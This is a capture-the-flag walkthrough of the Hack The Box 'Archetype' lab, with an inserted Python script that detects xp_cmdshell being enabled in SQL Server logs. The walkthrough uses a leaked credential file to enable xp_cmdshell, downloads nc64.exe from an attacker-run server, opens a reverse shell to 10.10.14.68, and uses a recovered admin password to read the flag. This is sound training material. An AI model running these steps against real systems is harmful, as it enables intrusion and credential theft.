Start by finding a Chinese-language tutorial to follow:

HTB Archetype box: SQL Server privilege escalation - 重返太空's blog - CSDN

https://www.czfq99.cn/archives/94.html

Judging from the title, this looks like SQL Server privilege escalation.

Let's begin. First, scan the ports to see which ones are open:

┌──(kali㉿kali)-[~]
└─$ nmap -sV 10.129.121.52
Starting Nmap 7.93 ( https://nmap.org ) at 2023-07-17 04:02 EDT
Nmap scan report for 10.129.121.52
Host is up (0.37s latency).
Not shown: 996 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
1433/tcp open ms-sql-s Microsoft SQL Server 2017 14.00.1000
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 77.41 seconds

┌──(kali㉿kali)-[~]
└─$ nmap -sV -sC 10.129.168.67
Starting Nmap 7.93 ( https://nmap.org ) at 2023-07-18 03:34 EDT
Nmap scan report for 10.129.168.67
Host is up (0.37s latency).
Not shown: 996 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Windows Server 2019 Standard 17763 microsoft-ds
1433/tcp open ms-sql-s Microsoft SQL Server 2017 14.00.1000.00; RTM
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2023-07-18T06:36:33
|_Not valid after: 2053-07-18T06:36:33
|_ssl-date: 2023-07-18T07:37:27+00:00; -1s from scanner time.
| ms-sql-info:
| 10.129.168.67:1433:
| Version:
| name: Microsoft SQL Server 2017 RTM
| number: 14.00.1000.00
| Product: Microsoft SQL Server 2017
| Service pack level: RTM
| Post-SP patches applied: false
|_ TCP port: 1433
| ms-sql-ntlm-info:
| 10.129.168.67:1433:
| Target_Name: ARCHETYPE
| NetBIOS_Domain_Name: ARCHETYPE
| NetBIOS_Computer_Name: ARCHETYPE
| DNS_Domain_Name: Archetype
| DNS_Computer_Name: Archetype
|_ Product_Version: 10.0.17763
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 1h23m59s, deviation: 3h07m52s, median: -1s
| smb-os-discovery:
| OS: Windows Server 2019 Standard 17763 (Windows Server 2019 Standard 6.3)
| Computer name: Archetype
| NetBIOS computer name: ARCHETYPE\x00
| Workgroup: WORKGROUP\x00
|_ System time: 2023-07-18T00:37:03-07:00
| smb2-security-mode:
| 311:
|_ Message signing enabled but not required
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-time:
| date: 2023-07-18T07:37:00
|_ start_date: N/A

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 162.12 seconds

Ports 135, 139, 445 and 1433 are open. SMB was already covered in the third box, Dancing.

  • Port 135 is the Remote Procedure Call (RPC) port, Client-Server Model (client-server applications)
  • Port 139 is netbios-ssn. NetBIOS is the protocol used for file and print sharing on all current versions of Windows; by default, once file and print sharing is enabled, it binds to everything, including TCP/IP, which means that in a misconfigured setup local shares can be reached from the Internet
  • Port 445 is the microsoft-ds service, also Client-Server Model, used for direct TCP/IP MS network access without the NetBIOS layer; the SMB protocol is used for file sharing on Windows NT/2K/XP and later

Use the smbclient command-line tool to connect; the -L option lists the shares exported by the server.

The password is empty, so just go in and take a look.

┌──(kali㉿kali)-[~]
└─$ smbclient -L 10.129.121.52
Password for [WORKGROUP\kali]:

Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
backups Disk
C$ Disk Default share
IPC$ IPC Remote IPC
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.129.121.52 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available

With the experience from Dancing, connect straight to backups (no password needed) and download prod.dtsConfig to inspect locally:

┌──(kali㉿kali)-[~]
└─$ smbclient \\\\10.129.121.52\\backups
Password for [WORKGROUP\kali]:
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Mon Jan 20 07:20:57 2020
.. D 0 Mon Jan 20 07:20:57 2020
prod.dtsConfig AR 609 Mon Jan 20 07:23:02 2020

5056511 blocks of size 4096. 2616219 blocks available
smb: \> cat prod.dtsConfig
cat: command not found
smb: \> get prod.dtsConfig
getting file \prod.dtsConfig of size 609 as prod.dtsConfig (0.3 KiloBytes/sec) (average 0.3 KiloBytes/sec)

What on earth is this?

┌──(kali㉿kali)-[~]
└─$ cat prod.dtsConfig
<DTSConfiguration>
<DTSConfigurationHeading>
<DTSConfigurationFileInfo GeneratedBy="..." GeneratedFromPackageName="..." GeneratedFromPackageID="..." GeneratedDate="20.1.2019 10:01:34"/>
</DTSConfigurationHeading>
<Configuration ConfiguredType="Property" Path="\Package.Connections[Destination].Properties[ConnectionString]" ValueType="String">
<ConfiguredValue>Data Source=.;Password=M3g4c0rp123;User ID=ARCHETYPE\sql_svc;Initial Catalog=Catalog;Provider=SQLNCLI10.1;Persist Security Info=True;Auto Translate=False;</ConfiguredValue>
</Configuration>
</DTSConfiguration>

Oh, it's SQL Server, a relational database.

The file also leaks sensitive information (the MSSQL account and password):

ID:ARCHETYPE\sql_svc

Password:M3g4c0rp123

How do we connect? Use the recommended impacket package, which ships with Kali; on Windows you can use the SQL Server Management desktop tool.

┌──(kali㉿kali)-[~]
└─$ impacket-mssqlclient -h
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation

usage: mssqlclient.py [-h] [-port PORT] [-db DB] [-windows-auth] [-debug] [-file FILE]
[-hashes LMHASH:NTHASH] [-no-pass] [-k] [-aesKey hex key] [-dc-ip ip address]
target

TDS client implementation (SSL supported).

positional arguments:
target [[domain/]username[:password]@]<targetName or address>

options:
-h, --help show this help message and exit
-port PORT target MSSQL port (default 1433)
-db DB MSSQL database instance (default None)
-windows-auth whether or not to use Windows Authentication (default False)
-debug Turn DEBUG output ON
-file FILE input file with commands to execute in the SQL shell

authentication:
-hashes LMHASH:NTHASH
NTLM hashes, format is LMHASH:NTHASH
-no-pass don't ask for password (useful for -k)
-k Use Kerberos authentication. Grabs credentials from ccache file (KRB5CCNAME) based
on target parameters. If valid credentials cannot be found, it will use the ones
specified in the command line
-aesKey hex key AES key to use for Kerberos Authentication (128 or 256 bits)
-dc-ip ip address IP Address of the domain controller. If ommited it use the domain part (FQDN)
specified in the target parameter

With the account and password in hand, just connect directly:

┌──(kali㉿kali)-[~]
└─$ impacket-mssqlclient -windows-auth ARCHETYPE/sql_svc@10.129.121.52
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation

Password:
[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(ARCHETYPE): Line 1: Changed database context to 'master'.
[*] INFO(ARCHETYPE): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (140 3232)
[!] Press help for extra shell commands
SQL> help

lcd {path} - changes the current local directory to {path}
exit - terminates the server process (and this session)
enable_xp_cmdshell - you know what it means
disable_xp_cmdshell - you know what it means
xp_cmdshell {cmd} - executes cmd using xp_cmdshell
sp_start_job {cmd} - executes cmd using the sql server agent (blind)
! {cmd} - executes a local shell cmd

There doesn't seem to be much in this database, so the next step is privilege escalation.

Use xp_cmdshell to run system commands. xp_cmdshell lets a system administrator execute a given command string through the operating system command shell; it is a native SQL Server component.

It errors out, and it turns out the feature isn't enabled:

xp_cmdshell "whoami"

[-] ERROR(ARCHETYPE): Line 1: Incorrect syntax near '>'.

Change the configuration with the following commands:

SQL> EXECUTE sp_configure 'show advanced options', 1;
SQL> RECONFIGURE;
SQL> EXECUTE sp_configure 'xp_cmdshell', 1;
SQL> RECONFIGURE;
SQL> SELECT is_srvrolemember('sysadmin');


-----------

1

SQL> EXEC xp_cmdshell 'net user';
[-] ERROR(ARCHETYPE): Line 1: SQL Server blocked access to procedure 'sys.xp_cmdshell' of component 'xp_cmdshell' because this component is turned off as part of the security configuration for this server. A system administrator can enable the use of 'xp_cmdshell' by using sp_configure. For more information about enabling 'xp_cmdshell', search for 'xp_cmdshell' in SQL Server Books Online.
SQL> EXEC sp_configure 'show advanced options', 1;
[*] INFO(ARCHETYPE): Line 185: Configuration option 'show advanced options' changed from 0 to 1. Run the RECONFIGURE statement to install.
SQL> RECONFIGURE;
SQL> sp_configure; - Enabling the sp_configure as stated in the above error message
[-] ERROR(ARCHETYPE): Line 1: Incorrect syntax near '-'.
SQL> EXEC sp_configure 'xp_cmdshell', 1;
[*] INFO(ARCHETYPE): Line 185: Configuration option 'xp_cmdshell' changed from 0 to 1. Run the RECONFIGURE statement to install.
SQL> RECONFIGURE;
SQL> xp_cmdshell "whoami"
output

--------------------------------------------------------------------------------

archetype\sql_svc

NULL
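As an added example from the detection side (not part of the original writeup), the following Python parses SQL Server ERRORLOG lines carrying the "Configuration option ... changed from 0 to 1" message seen in the session above and raises an alert when xp_cmdshell (or a similar option) is enabled, escalating the severity when the same spid enabled 'show advanced options' shortly before. The log lines are constructed to match the ERRORLOG layout.

```python
import re
from datetime import datetime, timedelta

# Message 15457 as SQL Server writes it, after the ERRORLOG timestamp and source column.
CONFIG_CHANGE_RE = re.compile(
    r"^(?P<ts>\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2}\.\d{2}) (?P<source>\S+)\s+"
    r"Configuration option '(?P<option>[^']+)' changed from (?P<old>\d+) to (?P<new>\d+)\."
)

# Options that turn the database engine into an OS command or COM execution path.
WATCHED_OPTIONS = {"xp_cmdshell", "Ole Automation Procedures", "Ad Hoc Distributed Queries"}

# Constructed ERRORLOG excerpt (not real data): the enable sequence plus a benign change.
SAMPLE_ERRORLOG = """\
2023-07-18 04:20:01.10 spid55      Configuration option 'show advanced options' changed from 0 to 1. Run the RECONFIGURE statement to install.
2023-07-18 04:20:07.43 spid55      Configuration option 'xp_cmdshell' changed from 0 to 1. Run the RECONFIGURE statement to install.
2023-07-18 04:21:30.00 spid57      Configuration option 'max server memory (MB)' changed from 2147483647 to 4096. Run the RECONFIGURE statement to install.
"""


def parse_config_changes(log_text):
    """Return one event dict per sp_configure change line, in log order."""
    events = []
    for line in log_text.splitlines():
        m = CONFIG_CHANGE_RE.match(line)
        if m:
            events.append({
                "ts": datetime.strptime(m["ts"], "%Y-%m-%d %H:%M:%S.%f"),
                "source": m["source"], "option": m["option"],
                "old": int(m["old"]), "new": int(m["new"]),
            })
    return events


def detect_cmdshell_enablement(log_text, window=timedelta(minutes=5)):
    """Alert on watched options flipped 0 -> 1. Severity is HIGH when the same
    spid enabled 'show advanced options' within `window` beforehand (the exact
    two-step sequence used in the session above), otherwise MEDIUM."""
    events = parse_config_changes(log_text)
    alerts = []
    for ev in events:
        if ev["option"] in WATCHED_OPTIONS and ev["old"] == 0 and ev["new"] == 1:
            preceded = any(
                p["option"] == "show advanced options" and p["new"] == 1
                and p["source"] == ev["source"]
                and timedelta(0) <= ev["ts"] - p["ts"] <= window
                for p in events
            )
            alerts.append({"option": ev["option"], "source": ev["source"],
                           "severity": "HIGH" if preceded else "MEDIUM"})
    return alerts
```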

Check the current directory:

SQL> xp_cmdshell "powershell -c pwd"
output

--------------------------------------------------------------------------------

NULL

Path

----

C:\Windows\system32

NULL

NULL

NULL

SQL>

The network was painfully slow; nc64 had to be downloaded over the VPN on my own machine, and putting it on the Desktop didn't work: nc had to be placed in the current path.

SQL> xp_cmdshell "powershell -c cd C:\Users\sql_svc\Downloads; wget http://10.10.14.68/nc64.exe -outfile nc64.exe"
output

--------------------------------------------------------------------------------

wget : <!DOCTYPE HTML>

<html lang="en">

<head>

<meta charset="utf-8">

<title>Error response</title>

</head>

<body>

<h1>Error response</h1>

<p>Error code: 404</p>

<p>Message: File not found.</p>

<p>Error code explanation: 404 - Nothing matches the given URI.</p>

</body>

</html>

At line:1 char:32

+ ... sql_svc\Downloads; wget http://10.10.14.68/nc64.exe -outfile nc64.exe

+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

+ CategoryInfo : InvalidOperation: (System.Net.HttpWebRequest:HttpWebRequest) [Invoke-WebRequest], WebExc

eption

+ FullyQualifiedErrorId : WebCmdletWebResponseException,Microsoft.PowerShell.Commands.InvokeWebRequestCommand

NULL

SQL> xp_cmdshell "powershell -c cd C:\Users\sql_svc\Downloads; wget http://10.10.14.68/nc64.exe -outfile nc64.exe"
output

--------------------------------------------------------------------------------

NULL

SQL>

The listener finally returned a 200:

┌──(kali㉿kali)-[~]
└─$ sudo python3 -m http.server 80
[sudo] password for kali:
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.129.168.67 - - [18/Jul/2023 04:26:15] code 404, message File not found
10.129.168.67 - - [18/Jul/2023 04:26:15] "GET /nc64.exe HTTP/1.1" 404 -
10.129.168.67 - - [18/Jul/2023 04:39:58] code 404, message File not found
10.129.168.67 - - [18/Jul/2023 04:39:58] "GET /nc64.exe HTTP/1.1" 404 -
10.129.168.67 - - [18/Jul/2023 04:41:07] "GET /nc64.exe HTTP/1.1" 200 -

Now we can use nc to bind cmd.exe to our listener:

SQL>  xp_cmdshell "powershell -c cd C:\Users\sql_svc\Downloads; .\nc64.exe -e cmd.exe 10.10.14.68 443"

Now look at the nc listener on port 443: we have a shell session:

┌──(kali㉿kali)-[~]
└─$ sudo nc -lvnp 443
[sudo] password for kali:
listening on [any] 443 ...
connect to [10.10.14.68] from (UNKNOWN) [10.129.168.67] 49678
Microsoft Windows [Version 10.0.17763.2061]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Users\sql_svc\Downloads>dir
dir
Volume in drive C has no label.
Volume Serial Number is 9565-0B4F

Directory of C:\Users\sql_svc\Downloads

07/18/2023 01:41 AM <DIR> .
07/18/2023 01:41 AM <DIR> ..
07/18/2023 01:41 AM 45,272 nc64.exe
1 File(s) 45,272 bytes
2 Dir(s) 10,714,288,128 bytes free

C:\Users\sql_svc\Downloads>whoami
whoami
archetype\sql_svc

Still no privileges, haha.

Introducing the privilege-escalation tool WinPEAS; again downloaded over the VPN, and on Windows the antivirus protection also had to be turned off.

Then the listener showed a 200:

C:\Users\sql_svc\Downloads>powershell -c wget http://10.10.14.68/winPEASx64.exe -outfile winPEASx64.exe
powershell -c wget http://10.10.14.68/winPEASx64.exe -outfile winPEASx64.exe

10.129.168.67 - - [18/Jul/2023 05:09:58] "GET /winPEASx64.exe HTTP/1.1" 200 -

C:\Users\sql_svc\Downloads>dir
dir
Volume in drive C has no label.
Volume Serial Number is 9565-0B4F

Directory of C:\Users\sql_svc\Downloads

07/18/2023 02:09 AM <DIR> .
07/18/2023 02:09 AM <DIR> ..
07/18/2023 01:41 AM 45,272 nc64.exe
07/18/2023 02:06 AM 0 powershell
07/18/2023 02:10 AM 1,930,752 winPEASx64.exe
3 File(s) 1,976,024 bytes
2 Dir(s) 10,710,515,712 bytes free

Run the privilege-escalation tool from the command line; at the end it shows:

����������͹ Analyzing Other Windows Files Files (limit 70)

/---------------------------------------------------------------------------\
| Do you like PEASS? |
|---------------------------------------------------------------------------|
| Become a Patreon : https://www.patreon.com/peass |
| Follow on Twitter : @carlospolopm |
| Respect on HTB : SirBroccoli & makikvues |
|---------------------------------------------------------------------------|
| Thank you! |
\---------------------------------------------------------------------------/

Password: MEGACORP_4dm1n!!

C:\Users\sql_svc\Downloads>cd ..
cd ..

C:\Users\sql_svc>cd AppData
cd AppData

C:\Users\sql_svc\AppData>cd \Roaming\Microsoft\Windows\PowerShell\PSReadline\
cd \Roaming\Microsoft\Windows\PowerShell\PSReadline\
The system cannot find the path specified.

C' is not recognized as an internal or external command,
operable program or batch file.

C:\Users\sql_svc\AppData>cd Roaming\Microsoft\Windows\PowerShell\PSReadline\
cd Roaming\Microsoft\Windows\PowerShell\PSReadline\

C:\Users\sql_svc\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine>dir
dir
Volume in drive C has no label.
Volume Serial Number is 9565-0B4F

Directory of C:\Users\sql_svc\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine

01/20/2020 06:04 AM <DIR> .
01/20/2020 06:04 AM <DIR> ..
03/17/2020 02:36 AM 79 ConsoleHost_history.txt
1 File(s) 79 bytes
2 Dir(s) 10,710,208,512 bytes free

C:\Users\sql_svc\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine>type ConsoleHost_history.txt
type ConsoleHost_history.txt
net.exe use T: \\Archetype\backups /user:administrator MEGACORP_4dm1n!!
exit

C:\Users\sql_svc\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine>python3 psexec.py administrator@10.129.168.67
python3 psexec.py administrator@10.129.168.67
'python3' is not recognized as an internal or external command,
operable program or batch file.

C:\Users\sql_svc\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine>
C:\Windows\system32> cd ..

C:\Windows> cd ..

C:\> cd User
The system cannot find the path specified.

C:\> cd Users

C:\Users> cd Administartor
The system cannot find the path specified.

C:\Users> cd Administrator

C:\Users\Administrator> cd Desktop

C:\Users\Administrator\Desktop> type root.txt
b91ccec3305e98240082d4474b848528

PWN